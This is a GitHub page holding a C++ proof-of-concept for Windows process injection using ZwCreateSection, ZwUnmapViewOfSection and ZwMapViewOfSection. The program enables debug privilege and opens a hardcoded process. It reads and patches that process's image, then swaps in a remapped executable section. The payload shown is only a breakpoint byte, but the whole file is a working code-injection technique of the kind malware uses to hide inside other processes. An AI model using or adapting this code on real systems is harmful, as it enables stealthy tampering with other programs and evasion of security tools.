-
Notifications
You must be signed in to change notification settings - Fork 8
/
Copy pathzwmapviewofsection_inj.cpp
executable file
·121 lines (108 loc) · 3.62 KB
/
zwmapviewofsection_inj.cpp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
#include <windows.h>
#include <stdio.h>
#include <Tlhelp32.h>
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
// REF : http://blog.w4kfu.com/post/new_method_of_injection
void EnableDebugPrivilege() {
//elevator
TOKEN_PRIVILEGES priv;
HANDLE n1;
LUID luid;
if(!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY, &n1)) printf("Error OPT\n");
if(!LookupPrivilegeValueA(NULL, SE_DEBUG_NAME, &luid)) printf("Error LPV\n");
priv.PrivilegeCount=1;
priv.Privileges[0].Luid=luid;
priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if(!AdjustTokenPrivileges(n1, FALSE, &priv, sizeof(priv), NULL, NULL)) printf("Error APT\n") ;
CloseHandle(n1);
}
int main(int argc, char** argv)
{
NTSTATUS (__stdcall *ZwMapViewOfSection) (
HANDLE SectionHandle,
HANDLE ProcessHandle,
OUT PVOID *BaseAddress,
ULONG_PTR ZeroBits,
SIZE_T CommitSize,
PLARGE_INTEGER SectionOffset,
PSIZE_T ViewSize,
DWORD InheritDisposition,
ULONG AllocationType,
ULONG Win32Protect
);
NTSTATUS (__stdcall *ZwCreateSection)(
PHANDLE SectionHandle,
ACCESS_MASK DesiredAccess,
PDWORD ObjectAttributes OPTIONAL,
PLARGE_INTEGER MaximumSize OPTIONAL,
ULONG SectionPageProtection,
ULONG AllocationAttributes,
HANDLE FileHandle OPTIONAL
);
NTSTATUS (__stdcall *ZwUnmapViewOfSection)(
HANDLE ProcessHandle,
PVOID BaseAddress
);
DWORD pid, tid;
PVOID zone;
HANDLE hsect;
LARGE_INTEGER a;
a.HighPart = 0;
a.LowPart = 0x6000;
SIZE_T size;
size = 0x6000;
PVOID BaseAddress = (PVOID)0;
HANDLE hproc;
NTSTATUS stat;
ZwMapViewOfSection = (long (__stdcall *)(HANDLE,HANDLE,PVOID *,ULONG_PTR,SIZE_T,PLARGE_INTEGER,PSIZE_T,DWORD,ULONG,ULONG))GetProcAddress(GetModuleHandleA("ntdll"),"ZwMapViewOfSection");
ZwCreateSection = (long (__stdcall *)(PHANDLE,ACCESS_MASK,PDWORD,PLARGE_INTEGER,ULONG,ULONG,HANDLE))GetProcAddress(GetModuleHandleA("ntdll"),"ZwCreateSection");
ZwUnmapViewOfSection = (long (__stdcall *)(HANDLE,PVOID))GetProcAddress(GetModuleHandleA("ntdll"),"ZwUnmapViewOfSection");
zone = malloc(0x6000);
EnableDebugPrivilege();
if(!ZwMapViewOfSection || !ZwCreateSection || !ZwUnmapViewOfSection)
{
printf("GetProcAddr fail.\n");
return 1;
}
pid = 0x31c;
hproc=OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
if(hproc == NULL)
{
printf("OpenProc %x fail.\n",GetLastError());
return 1;
}
ReadProcessMemory(hproc,(PVOID)0x400000,zone, 0x6000, &size);
//crée la section de 0x6000 dans notre process
stat = ZwCreateSection(&hsect,SECTION_ALL_ACCESS, NULL, &a, PAGE_EXECUTE_READWRITE, SEC_COMMIT, NULL);
if(stat !=STATUS_SUCCESS)
{
printf("ZwCreateSection %x fail.\n",stat);
return 1;
}
//map la section dans notre process
stat = ZwMapViewOfSection(hsect,GetCurrentProcess(),&BaseAddress,NULL,NULL,NULL,&size,1,NULL,PAGE_EXECUTE_READWRITE);
if(stat !=STATUS_SUCCESS)
{
printf("ZwMapViewOfSection %x fail.\n",stat);
return 1;
}
//now on la modifie avec notre data
*((PBYTE)zone+0x1018) = 0xCC;
memcpy(BaseAddress,zone,0x6000);
//on unmap dans l'autre process l'ancienne zone
BaseAddress = (PVOID)0x00400000;
stat = ZwUnmapViewOfSection(hproc, BaseAddress);
if(stat != STATUS_SUCCESS)
{
printf("ZwUnmapViewOfSection %x fail.\n",stat);
return 1;
}
//on map dans le nouveau process notre zone :)
stat = ZwMapViewOfSection(hsect, hproc, &BaseAddress, NULL, NULL, NULL, &size, 1, NULL, PAGE_EXECUTE_READWRITE);
if(stat !=STATUS_SUCCESS)
{
printf("ZwMapViewOfSection %x fail.\n",stat);
return 1;
}
return 0;
}